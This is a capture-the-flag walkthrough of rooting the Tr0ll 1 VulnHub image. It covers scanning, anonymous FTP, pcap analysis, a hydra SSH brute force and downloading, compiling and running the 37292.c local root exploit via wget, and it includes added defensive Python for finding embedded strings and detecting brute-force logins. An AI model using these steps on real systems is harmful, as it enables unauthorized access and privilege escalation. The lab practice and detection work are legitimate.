This is my walk-through of how I gained root access to the Tr0ll 1 CTF image posted on vulnhub.com. Here we go.

Once the image loaded up, we need to figure out the IP address of the host.

nmap -sn -PE 192.168.1.200-254

Ok, so the host pulled .207 from DHCP. Let's do a deeper scan.

nmap -p- -A 192.168.1.207

The nmap scan shows anonymous FTP open, along with port 80 and SSH. The scan also discovered a robots.txt file and a /secret directory. Let's open a browser and see what we can find.

Connecting to the site just shows us an image. Viewing the source doesn't help us any here.

Next, I checked out the robots.txt file.

The robots.txt file only lists the /secret path, which we already saw in the nmap scan. Let's check it out.

Nothing really helpful here. View-source doesn't show us anything either. Next I ran Nikto, which didn't find anything of use, so I decided to check out the anonymous FTP access.

I found a .pcap file via FTP. So I grabbed the file and opened it up in Wireshark.

As you can see in the screenshot, I found a reference to sup3rs3cr3tdirlol. It took me a bit to figure this out, but it turns out it was a directory on the web server, and it contained a file.

I saved the file to my Kali machine. I ran exiftool against the file, but didn't find anything useful.

exiftool roflmao

So I made the file executable and tried to run it, and tried a few other things. This took me a VERY long time to figure out, but I finally did: there is a line in the strings output that references an address.

strings roflmao

This is actually a directory on the web server, which contains two additional directories.
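The address that strings turned up is a hardcoded location embedded in a shipped binary, which is exactly the kind of thing a release check should catch before an artifact goes out. The following is an added example, not code from the original walkthrough: it re-implements the core of strings (runs of printable ASCII) and then flags any URL- or path-like strings it finds. The binary blob is constructed inline, and the directory name and URL inside it are placeholders, not values from the CTF image.

```python
import re

# Runs of at least min_len printable ASCII bytes, the same heuristic `strings` uses.
STRINGS_RE_TEMPLATE = rb"[\x20-\x7e]{%d,}"

# URL first, then an absolute path of at least 3 characters after the leading slash.
LOCATION_RE = re.compile(r"(?:https?://\S+|/[A-Za-z0-9._~/-]{3,})")


def extract_strings(data: bytes, min_len: int = 4):
    """Return printable-ASCII runs of at least min_len bytes, decoded to str."""
    pattern = re.compile(STRINGS_RE_TEMPLATE % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def find_embedded_locations(data: bytes):
    """Return every URL or absolute path found inside the binary's strings."""
    hits = []
    for s in extract_strings(data):
        hits.extend(m.group() for m in LOCATION_RE.finditer(s))
    return hits


# Constructed sample: an ELF-like header, some non-printable padding, one hidden
# hint string, a compiler tag, and a URL. None of these values come from the CTF.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 8
    + b"Find address /placeholder_dir/ to proceed" + b"\x00\x01\x02"
    + b"GCC: (Ubuntu) 4.8" + b"\x00"
    + b"http://example.invalid/notes.txt"
)

if __name__ == "__main__":
    for hit in find_embedded_locations(SAMPLE_BLOB):
        print("embedded location:", hit)
```

Pointing `find_embedded_locations` at a real file (`open(path, "rb").read()`) gives a quick pre-release check for hardcoded endpoints and hidden paths; anything it reports should be either documented or removed.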

Checking out the good_luck folder, I found a txt file. I downloaded and examined it, and I'm guessing this is a list of usernames.

cat which_one_lol.txt

Checking out the this_folder_contains_the_password folder, there is another file, Pass.txt. I download it and take a look. A single password?

This took me a bit to figure out as well. But the usernames are in the which_one file, and the password is literally the filename, Pass.txt.

hydra -L which_one_lol.txt -p Pass.txt 192.168.1.207 ssh
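A run like the hydra command above leaves a very recognisable trail on the target: a burst of "Failed password" lines for many different usernames from one source address, followed by an "Accepted password". The example below is added here and is not part of the original walkthrough; it parses sshd lines in the auth.log format and flags any source IP that produces at least `threshold` failures inside a `window_seconds` sliding window, reporting how many distinct usernames were tried and whether a successful login followed. The log lines are constructed sample data, the hostname, usernames and IPs are placeholders, and the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log excerpt (placeholder host, users and addresses).
SAMPLE_LOG = """\
Apr  3 12:00:01 victim sshd[2001]: Failed password for invalid user alice from 10.0.0.5 port 50012 ssh2
Apr  3 12:00:01 victim sshd[2002]: Failed password for invalid user bob from 10.0.0.5 port 50013 ssh2
Apr  3 12:00:02 victim sshd[2003]: Failed password for invalid user carol from 10.0.0.5 port 50014 ssh2
Apr  3 12:00:02 victim sshd[2004]: Failed password for dave from 10.0.0.5 port 50015 ssh2
Apr  3 12:00:03 victim sshd[2005]: Failed password for invalid user erin from 10.0.0.5 port 50016 ssh2
Apr  3 12:00:03 victim sshd[2006]: Accepted password for frank from 10.0.0.5 port 50017 ssh2
Apr  3 12:30:00 victim sshd[2100]: Failed password for frank from 10.0.0.9 port 41000 ssh2
Apr  3 12:30:40 victim sshd[2101]: Accepted password for frank from 10.0.0.9 port 41001 ssh2
"""

# Matches both "Failed password for invalid user X" and "Failed/Accepted password for X".
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_events(text, year=2024):
    """Return (timestamp, result, user, ip) tuples; year is assumed (syslog omits it)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a password-auth line, ignore
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events, window_seconds=60, threshold=5):
    """Flag source IPs with >= threshold failures inside any window_seconds span.

    Each finding also reports the number of distinct usernames tried (many
    distinct users from one source is the password-spray signature) and whether
    an Accepted login from that source followed the failures.
    """
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)

    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "Failed"]
        # Sliding window over the failure timestamps: widest run within window_seconds.
        start, best = 0, 0
        for end in range(len(fails)):
            while (fails[end][0] - fails[start][0]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            users = {e[2] for e in fails}
            success_after = any(e[1] == "Accepted" and e[0] >= fails[0][0] for e in evs)
            findings.append({
                "ip": ip,
                "failures": len(fails),
                "max_in_window": best,
                "distinct_users": len(users),
                "success_after": success_after,
            })
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(parse_events(SAMPLE_LOG)):
        print(finding)
```

The single failure from 10.0.0.9 (a user mistyping a password) stays below the threshold, while the burst from 10.0.0.5 is flagged with `success_after` set, which is the finding worth paging on: the guess succeeded. The threshold and window are assumptions to tune per environment.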

Now, let's SSH to the host and see what OS/kernel versions are being used.

Ok, so the host is running Ubuntu 14.04 with a 3.13 kernel. Let's see if I can find any privilege escalation vulnerabilities for these versions.

searchsploit ubuntu 14.04

After doing a little research, 37292.c looks promising. Let's download it to the host.

wget http://192.168.1.113/37292.c

Now let's compile and run it.

gcc 37292.c -o priv

./priv

Looks like it worked. We are able to get to the /root folder and read proof.txt.